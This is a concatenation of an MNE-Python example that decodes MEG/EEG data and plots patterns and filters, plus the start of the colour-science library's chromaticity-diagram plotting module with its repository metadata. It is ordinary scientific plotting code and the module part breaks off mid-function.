vectors). The patterns explain how the MEG and EEG data were generated from
the discriminant neural sources which are extracted by the filters.
Note patterns/filters in MEG data are more similar than EEG data
because the noise is less spatially correlated in MEG than EEG.
"""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Romain Trachel <trachelr@gmail.com>
# Jean-Remi King <jeanremi.king@gmail.com>
#
# License: BSD-3-Clause
# %%
import mne
from mne import io, EvokedArray
from mne.datasets import sample
from mne.decoding import Vectorizer, get_coef
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
# import a linear classifier from mne.decoding
from mne.decoding import LinearModel
print(__doc__)
data_path = sample.data_path()
sample_path = data_path / "MEG" / "sample"
# %%
# Set parameters
raw_fname = sample_path / "sample_audvis_filt-0-40_raw.fif"
event_fname = sample_path / "sample_audvis_filt-0-40_raw-eve.fif"
tmin, tmax = -0.1, 0.4
event_id = dict(aud_l=1, vis_l=3)
# Setup for reading the raw data
raw = io.read_raw_fif(raw_fname, preload=True)
raw.filter(0.5, 25, fir_design="firwin")
events = mne.read_events(event_fname)
# Read epochs
epochs = mne.Epochs(
raw, events, event_id, tmin, tmax, proj=True, decim=2, baseline=None, preload=True
)
del raw
labels = epochs.events[:, -1]
# get MEG and EEG data
meg_epochs = epochs.copy().pick_types(meg=True, eeg=False)
meg_data = meg_epochs.get_data().reshape(len(labels), -1)
# %%
# Decoding in sensor space using a LogisticRegression classifier
# --------------------------------------------------------------
clf = LogisticRegression(solver="liblinear") # liblinear is faster than lbfgs
scaler = StandardScaler()
# create a linear model with LogisticRegression
model = LinearModel(clf)
# fit the classifier on MEG data
X = scaler.fit_transform(meg_data)
model.fit(X, labels)
# Extract and plot spatial filters and spatial patterns
for name, coef in (("patterns", model.patterns_), ("filters", model.filters_)):
# We fitted the linear model onto Z-scored data. To make the filters
# interpretable, we must reverse this normalization step
coef = scaler.inverse_transform([coef])[0]
# The data was vectorized to fit a single model across all time points and
# all channels. We thus reshape it:
coef = coef.reshape(len(meg_epochs.ch_names), -1)
# Plot
evoked = EvokedArray(coef, meg_epochs.info, tmin=epochs.tmin)
fig = evoked.plot_topomap()
fig.suptitle(f"MEG {name}")
# %%
# Let's do the same on EEG data using a scikit-learn pipeline
X = epochs.pick_types(meg=False, eeg=True)
y = epochs.events[:, 2]
# Define a unique pipeline to sequentially:
clf = make_pipeline(
Vectorizer(), # 1) vectorize across time and channels
StandardScaler(), # 2) normalize features across trials
LinearModel( # 3) fits a logistic regression
LogisticRegression(solver="liblinear")
),
)
clf.fit(X, y)
# Extract and plot patterns and filters
for name in ("patterns_", "filters_"):
# The `inverse_transform` parameter will call this method on any estimator
# contained in the pipeline, in reverse order.
coef = get_coef(clf, name, inverse_transform=True)
evoked = EvokedArray(coef, epochs.info, tmin=epochs.tmin)
fig = evoked.plot_topomap()
fig.suptitle(f"EEG {name[:-1]}")
# %%
# References
# ----------
# .. footbibliography::
|
2ebf9f59e46f7ac532fe2b1dcb96c216a35c25f5
|
df1254b56f35b24644e00493c50d4b6eb3c15b7b
|
/colour/plotting/models.py
|
4cfea6b3f97e549ccbb4b67073f244ba63d19335
|
[
"BSD-3-Clause"
] |
permissive
|
colour-science/colour
|
908400b227cf81668675e41099256ce50b23ae4b
|
1fdf3b3042922e8d4f86b989b00a06e7e5d81102
|
refs/heads/develop
| 2023-09-01T23:17:07.186869
| 2023-08-26T09:40:45
| 2023-08-26T09:40:45
| 17,114,363
| 1,756
| 301
|
BSD-3-Clause
| 2023-09-14T10:24:37
| 2014-02-23T18:55:40
|
Python
|
UTF-8
|
Python
| false
| false
| 66,570
|
py
|
models.py
|
"""
Colour Models Plotting
======================
Defines the colour models plotting objects:
- :func:`colour.plotting.\
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931`
- :func:`colour.plotting.\
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS`
- :func:`colour.plotting.\
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS`
- :func:`colour.plotting.\
plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931`
- :func:`colour.plotting.\
plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS`
- :func:`colour.plotting.\
plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS`
- :func:`colour.plotting.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931`
- :func:`colour.plotting.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS`
- :func:`colour.plotting.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS`
- :func:`colour.plotting.plot_single_cctf`
- :func:`colour.plotting.plot_multi_cctfs`
- :func:`colour.plotting.plot_constant_hue_loci`
References
----------
- :cite:`Ebner1998` : Ebner, F., & Fairchild, M. D. (1998). Finding constant
hue surfaces in color space. In G. B. Beretta & R. Eschbach (Eds.), Proc.
SPIE 3300, Color Imaging: Device-Independent Color, Color Hardcopy, and
Graphic Arts III, (2 January 1998) (pp. 107-117). doi:10.1117/12.298269
- :cite:`Hung1995` : Hung, P.-C., & Berns, R. S. (1995). Determination of
constant Hue Loci for a CRT gamut and their predictions using color
appearance spaces. Color Research & Application, 20(5), 285-295.
doi:10.1002/col.5080200506
- :cite:`Mansencal2019` : Mansencal, T. (2019). Colour - Datasets.
doi:10.5281/zenodo.3362520
"""
from __future__ import annotations
import matplotlib.pyplot as plt
import numpy as np
import scipy.optimize
from matplotlib.patches import Ellipse
from matplotlib.path import Path
from colour.colorimetry import MultiSpectralDistributions
from colour.constants import EPSILON
from colour.geometry import (
point_at_angle_on_ellipse,
ellipse_coefficients_canonical_form,
ellipse_fitting,
)
from colour.graph import convert
from colour.hints import (
Any,
ArrayLike,
Callable,
Dict,
List,
Literal,
NDArrayFloat,
Sequence,
Tuple,
cast,
)
from colour.models import (
COLOURSPACE_MODELS_AXIS_LABELS,
COLOURSPACE_MODELS_DOMAIN_RANGE_SCALE_1_TO_REFERENCE,
CCTF_ENCODINGS,
CCTF_DECODINGS,
LCHab_to_Lab,
Lab_to_XYZ,
Luv_to_uv,
DATA_MACADAM_1942_ELLIPSES,
CCS_POINTER_GAMUT_BOUNDARY,
DATA_POINTER_GAMUT_VOLUME,
CCS_ILLUMINANT_POINTER_GAMUT,
RGB_Colourspace,
RGB_to_RGB,
RGB_to_XYZ,
UCS_to_uv,
XYZ_to_Luv,
XYZ_to_RGB,
XYZ_to_UCS,
XYZ_to_xy,
xy_to_Luv_uv,
xy_to_UCS_uv,
)
from colour.plotting import (
CONSTANTS_COLOUR_STYLE,
plot_chromaticity_diagram_CIE1931,
artist,
plot_chromaticity_diagram_CIE1960UCS,
plot_chromaticity_diagram_CIE1976UCS,
colour_cycle,
colour_style,
filter_passthrough,
filter_RGB_colourspaces,
filter_cmfs,
plot_multi_functions,
override_style,
render,
update_settings_collection,
)
from colour.plotting.diagrams import plot_chromaticity_diagram
from colour.utilities import (
CanonicalMapping,
as_array,
as_float_array,
as_int_array,
domain_range_scale,
first_item,
optional,
tsplit,
validate_method,
)
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "BSD-3-Clause - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"COLOURSPACE_MODELS_AXIS_ORDER",
"colourspace_model_axis_reorder",
"plot_pointer_gamut",
"plot_RGB_colourspaces_in_chromaticity_diagram",
"plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931",
"plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS",
"plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS",
"plot_RGB_chromaticities_in_chromaticity_diagram",
"plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931",
"plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS",
"plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS",
"ellipses_MacAdam1942",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS",
"plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS",
"plot_single_cctf",
"plot_multi_cctfs",
"plot_constant_hue_loci",
]
COLOURSPACE_MODELS_AXIS_ORDER: CanonicalMapping = CanonicalMapping(
{
"CAM02LCD": (1, 2, 0),
"CAM02SCD": (1, 2, 0),
"CAM02UCS": (1, 2, 0),
"CAM16LCD": (1, 2, 0),
"CAM16SCD": (1, 2, 0),
"CAM16UCS": (1, 2, 0),
"CIE XYZ": (0, 1, 2),
"CIE xyY": (0, 1, 2),
"CIE Lab": (1, 2, 0),
"CIE LCHab": (1, 2, 0),
"CIE Luv": (1, 2, 0),
"CIE LCHuv": (1, 2, 0),
"CIE UCS": (0, 1, 2),
"CIE UVW": (1, 2, 0),
"DIN99": (1, 2, 0),
"Hunter Lab": (1, 2, 0),
"Hunter Rdab": (1, 2, 0),
"ICaCb": (1, 2, 0),
"ICtCp": (1, 2, 0),
"IPT": (1, 2, 0),
"IPT Ragoo 2021": (1, 2, 0),
"IgPgTg": (1, 2, 0),
"Jzazbz": (1, 2, 0),
"OSA UCS": (1, 2, 0),
"Oklab": (1, 2, 0),
"hdr-CIELAB": (1, 2, 0),
"hdr-IPT": (1, 2, 0),
"Yrg": (1, 2, 0),
}
)
"""Colourspace models axis order."""
def colourspace_model_axis_reorder(
a: ArrayLike,
model: Literal[
"CAM02LCD",
"CAM02SCD",
"CAM02UCS",
"CAM16LCD",
"CAM16SCD",
"CAM16UCS",
"CIE XYZ",
"CIE xyY",
"CIE Lab",
"CIE LCHab",
"CIE Luv",
"CIE LCHuv",
"CIE UCS",
"CIE UVW",
"DIN99",
"Hunter Lab",
"Hunter Rdab",
"ICaCb",
"ICtCp",
"IPT",
"IPT Ragoo 2021",
"IgPgTg",
"Jzazbz",
"OSA UCS",
"Oklab",
"hdr-CIELAB",
"hdr-IPT",
"Yrg",
]
| str,
direction: Literal["Forward", "Inverse"] | str = "Forward",
) -> NDArrayFloat:
"""
Reorder the axes of given colourspace model :math:`a` array according to
the most common volume plotting axes order.
Parameters
----------
a
Colourspace model :math:`a` array.
model
Colourspace model, see :attr:`colour.COLOURSPACE_MODELS` attribute for
the list of supported colourspace models.
direction
Reordering direction.
Returns
-------
:class:`numpy.ndarray`
Reordered colourspace model :math:`a` array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> colourspace_model_axis_reorder(a, "CIE Lab")
array([ 1., 2., 0.])
>>> colourspace_model_axis_reorder(a, "IPT")
array([ 1., 2., 0.])
>>> colourspace_model_axis_reorder(a, "OSA UCS")
array([ 1., 2., 0.])
>>> b = np.array([1, 2, 0])
>>> colourspace_model_axis_reorder(b, "OSA UCS", "Inverse")
array([ 0., 1., 2.])
"""
a = as_float_array(a)
model = validate_method(
model,
tuple(COLOURSPACE_MODELS_AXIS_ORDER),
'"{0}" model is invalid, it must be one of {1}!',
)
direction = validate_method(
direction,
("Forward", "Inverse"),
'"{0}" direction is invalid, it must be one of {1}!',
)
order = COLOURSPACE_MODELS_AXIS_ORDER.get(model, (0, 1, 2))
if direction == "forward":
indexes = (order[0], order[1], order[2])
else:
indexes = (order.index(0), order.index(1), order.index(2))
return a[..., indexes]
@override_style()
def plot_pointer_gamut(
pointer_gamut_colours: ArrayLike | str | None = None,
pointer_gamut_opacity: float = 1,
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *Pointer's Gamut* according to given method.
Parameters
----------
pointer_gamut_colours
Colours of the *Pointer's Gamut*.
pointer_gamut_opacity
Opacity of the *Pointer's Gamut*.
method
Plotting method.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`, :func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_pointer_gamut() # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Pointer_Gamut.png
:align: center
:alt: plot_pointer_gamut
"""
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
pointer_gamut_colours = optional(
pointer_gamut_colours, CONSTANTS_COLOUR_STYLE.colour.dark
)
pointer_gamut_opacity = optional(
pointer_gamut_opacity, CONSTANTS_COLOUR_STYLE.opacity.high
)
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
if method == "cie 1931":
def XYZ_to_ij(
XYZ: NDArrayFloat, *args: Any # noqa: ARG001
) -> NDArrayFloat:
"""
Convert given *CIE XYZ* tristimulus values to *ij* chromaticity
coordinates.
"""
return XYZ_to_xy(XYZ)
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy
elif method == "cie 1960 ucs":
def XYZ_to_ij(
XYZ: NDArrayFloat, *args: Any # noqa: ARG001
) -> NDArrayFloat:
"""
Convert given *CIE XYZ* tristimulus values to *ij* chromaticity
coordinates.
"""
return UCS_to_uv(XYZ_to_UCS(XYZ))
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_UCS_uv(xy)
elif method == "cie 1976 ucs":
def XYZ_to_ij(XYZ: NDArrayFloat, *args: Any) -> NDArrayFloat:
"""
Convert given *CIE XYZ* tristimulus values to *ij* chromaticity
coordinates.
"""
return Luv_to_uv(XYZ_to_Luv(XYZ, *args), *args)
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_Luv_uv(xy)
ij = xy_to_ij(CCS_POINTER_GAMUT_BOUNDARY)
axes.plot(
ij[..., 0],
ij[..., 1],
label="Pointer's Gamut",
color=pointer_gamut_colours,
alpha=pointer_gamut_opacity,
zorder=CONSTANTS_COLOUR_STYLE.zorder.foreground_line,
)
axes.plot(
(ij[-1][0], ij[0][0]),
(ij[-1][1], ij[0][1]),
color=pointer_gamut_colours,
alpha=pointer_gamut_opacity,
zorder=CONSTANTS_COLOUR_STYLE.zorder.foreground_line,
)
XYZ = Lab_to_XYZ(
LCHab_to_Lab(DATA_POINTER_GAMUT_VOLUME), CCS_ILLUMINANT_POINTER_GAMUT
)
ij = XYZ_to_ij(XYZ, CCS_ILLUMINANT_POINTER_GAMUT)
scatter_settings = {
"alpha": pointer_gamut_opacity / 2,
"color": pointer_gamut_colours,
"marker": "+",
"zorder": CONSTANTS_COLOUR_STYLE.zorder.foreground_scatter,
}
axes.scatter(ij[..., 0], ij[..., 1], **scatter_settings)
settings.update({"axes": axes})
settings.update(kwargs)
return render(**settings)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable: Callable = plot_chromaticity_diagram,
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *Chromaticity Diagram* according
to given method.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable
Callable responsible for drawing the *Chromaticity Diagram*.
method
*Chromaticity Diagram* method.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_kwargs = [
... {"color": "r"},
... {"linestyle": "dashed"},
... {"marker": None},
... ]
>>> plot_RGB_colourspaces_in_chromaticity_diagram(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"], plot_kwargs=plot_kwargs
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram
"""
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
colourspaces = cast(
List[RGB_Colourspace],
list(filter_RGB_colourspaces(colourspaces).values()),
) # pyright: ignore
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
cmfs = cast(
MultiSpectralDistributions, first_item(filter_cmfs(cmfs).values())
)
title = (
f"{', '.join([colourspace.name for colourspace in colourspaces])}\n"
f"{cmfs.name} - {method.upper()} Chromaticity Diagram"
)
settings = {"axes": axes, "title": title, "method": method}
settings.update(kwargs)
settings["show"] = False
chromaticity_diagram_callable(**settings)
if show_pointer_gamut:
settings = {"axes": axes, "method": method}
settings.update(kwargs)
settings["show"] = False
plot_pointer_gamut(**settings)
if method == "cie 1931":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy
x_limit_min, x_limit_max = [-0.1], [0.9]
y_limit_min, y_limit_max = [-0.1], [0.9]
elif method == "cie 1960 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_UCS_uv(xy)
x_limit_min, x_limit_max = [-0.1], [0.7]
y_limit_min, y_limit_max = [-0.2], [0.6]
elif method == "cie 1976 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_Luv_uv(xy)
x_limit_min, x_limit_max = [-0.1], [0.7]
y_limit_min, y_limit_max = [-0.1], [0.7]
settings = {"colour_cycle_count": len(colourspaces)}
settings.update(kwargs)
cycle = colour_cycle(**settings)
plotting_colourspace = CONSTANTS_COLOUR_STYLE.colour.colourspace
plot_settings_collection = [
{
"label": f"{colourspace.name}",
"marker": "o",
"color": next(cycle)[:3],
"zorder": CONSTANTS_COLOUR_STYLE.zorder.foreground_line,
}
for colourspace in colourspaces
]
if plot_kwargs is not None:
update_settings_collection(
plot_settings_collection, plot_kwargs, len(colourspaces)
)
for i, colourspace in enumerate(colourspaces):
plot_settings = plot_settings_collection[i]
if chromatically_adapt and not np.array_equal(
colourspace.whitepoint, plotting_colourspace.whitepoint
):
colourspace = colourspace.chromatically_adapt( # noqa: PLW2901
plotting_colourspace.whitepoint,
plotting_colourspace.whitepoint_name,
)
# RGB colourspaces such as *ACES2065-1* have primaries with
# chromaticity coordinates set to 0 thus we prevent nan from being
# yield by zero division in later colour transformations.
P = np.where(
colourspace.primaries == 0,
EPSILON,
colourspace.primaries,
)
P = xy_to_ij(P)
W = xy_to_ij(colourspace.whitepoint)
P_p = np.vstack([P, P[0]])
axes.plot(P_p[..., 0], P_p[..., 1], **plot_settings)
if show_whitepoints:
plot_settings["marker"] = "o"
plot_settings.pop("label")
W_p = np.vstack([W, W])
axes.plot(W_p[..., 0], W_p[..., 1], **plot_settings)
x_limit_min.append(cast(float, np.amin(P[..., 0]) - 0.1))
y_limit_min.append(cast(float, np.amin(P[..., 1]) - 0.1))
x_limit_max.append(cast(float, np.amax(P[..., 0]) + 0.1))
y_limit_max.append(cast(float, np.amax(P[..., 1]) + 0.1))
bounding_box = (
min(x_limit_min),
max(x_limit_max),
min(y_limit_min),
max(y_limit_max),
)
settings.update(
{
"show": True,
"legend": True,
"bounding_box": bounding_box,
}
)
settings.update(kwargs)
return render(**settings)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable_CIE1931: Callable = (
plot_chromaticity_diagram_CIE1931
),
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *CIE 1931 Chromaticity Diagram*.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable_CIE1931
Callable responsible for drawing the *CIE 1931 Chromaticity Diagram*.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"]
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram_CIE1931.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1931"})
return plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces,
cmfs,
chromaticity_diagram_callable_CIE1931,
show_whitepoints=show_whitepoints,
show_pointer_gamut=show_pointer_gamut,
chromatically_adapt=chromatically_adapt,
plot_kwargs=plot_kwargs,
**settings,
)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable_CIE1960UCS: Callable = (
plot_chromaticity_diagram_CIE1960UCS
),
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *CIE 1960 UCS Chromaticity Diagram*.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable_CIE1960UCS
Callable responsible for drawing the
*CIE 1960 UCS Chromaticity Diagram*.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"]
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram_CIE1960UCS.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1960 UCS"})
return plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces,
cmfs,
chromaticity_diagram_callable_CIE1960UCS,
show_whitepoints=show_whitepoints,
show_pointer_gamut=show_pointer_gamut,
chromatically_adapt=chromatically_adapt,
plot_kwargs=plot_kwargs,
**settings,
)
@override_style()
def plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS(
colourspaces: RGB_Colourspace | str | Sequence[RGB_Colourspace | str],
cmfs: MultiSpectralDistributions
| str
| Sequence[
MultiSpectralDistributions | str
] = "CIE 1931 2 Degree Standard Observer",
chromaticity_diagram_callable_CIE1976UCS: Callable = (
plot_chromaticity_diagram_CIE1976UCS
),
show_whitepoints: bool = True,
show_pointer_gamut: bool = False,
chromatically_adapt: bool = False,
plot_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspaces in the *CIE 1976 UCS Chromaticity Diagram*.
Parameters
----------
colourspaces
*RGB* colourspaces to plot. ``colourspaces`` elements
can be of any type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
cmfs
Standard observer colour matching functions used for computing the
spectral locus boundaries. ``cmfs`` can be of any type or form
supported by the :func:`colour.plotting.common.filter_cmfs` definition.
chromaticity_diagram_callable_CIE1976UCS
Callable responsible for drawing the
*CIE 1976 UCS Chromaticity Diagram*.
show_whitepoints
Whether to display the *RGB* colourspaces whitepoints.
show_pointer_gamut
Whether to display the *Pointer's Gamut*.
chromatically_adapt
Whether to chromatically adapt the *RGB* colourspaces given in
``colourspaces`` to the whitepoint of the default plotting colourspace.
plot_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.plot` definition,
used to control the style of the plotted *RGB* colourspaces.
``plot_kwargs`` can be either a single dictionary applied to all the
plotted *RGB* colourspaces with the same settings or a sequence of
dictionaries with different settings for each plotted *RGB*
colourspace.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.plot_pointer_gamut`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS(
... ["ITU-R BT.709", "ACEScg", "S-Gamut"]
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Colourspaces_In_Chromaticity_Diagram_CIE1976UCS.png
:align: center
:alt: plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1976 UCS"})
return plot_RGB_colourspaces_in_chromaticity_diagram(
colourspaces,
cmfs,
chromaticity_diagram_callable_CIE1976UCS,
show_whitepoints=show_whitepoints,
show_pointer_gamut=show_pointer_gamut,
chromatically_adapt=chromatically_adapt,
plot_kwargs=plot_kwargs,
**settings,
)
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram
),
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
